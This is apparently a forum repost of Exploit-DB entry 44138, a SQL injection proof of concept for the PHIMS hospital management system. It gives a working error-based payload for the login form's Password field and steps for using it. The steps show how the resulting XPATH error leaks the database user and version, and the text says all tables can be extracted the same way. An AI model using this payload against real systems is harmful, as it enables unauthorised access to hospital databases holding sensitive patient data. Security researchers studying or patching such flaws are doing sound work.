- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 44138
- Проверка EDB
-
- Пройдено
- Автор
- L0RD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2018-02-16
PHIMS - Hospital Management Information System - 'Password' SQL Injection
Код:
# Exploit Title: PHIMS - Hospital Management Information System - 'Password' SQL Injection
# Dork: N/A
# Date: 2018-02-16
# Exploit Author: Borna nematzadeh (L0RD) or [email protected]
# Vendor Homepage: https://codecanyon.net/item/phims/14974225?s_rank=1566
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :
SQLI :
# Parameter : Password (POST)
# Type: Error based
# Title: MariaDB >= 10.2.11 AND Error based - extractvalue (XPATH query)
# Payload : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#
#######################################
# Discrption : The 'password' field is vulnerable in this script
('Password' parameter).First inject payload into this parameter.
# then put anything in username (like:[email protected]) and click
login. You will have XPATH syntax
error in the next page that contains user and db_name .
# You can find all tables and any information from database by using XPATH
query .
Username : [email protected]
Password : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#
- Источник
- www.exploit-db.com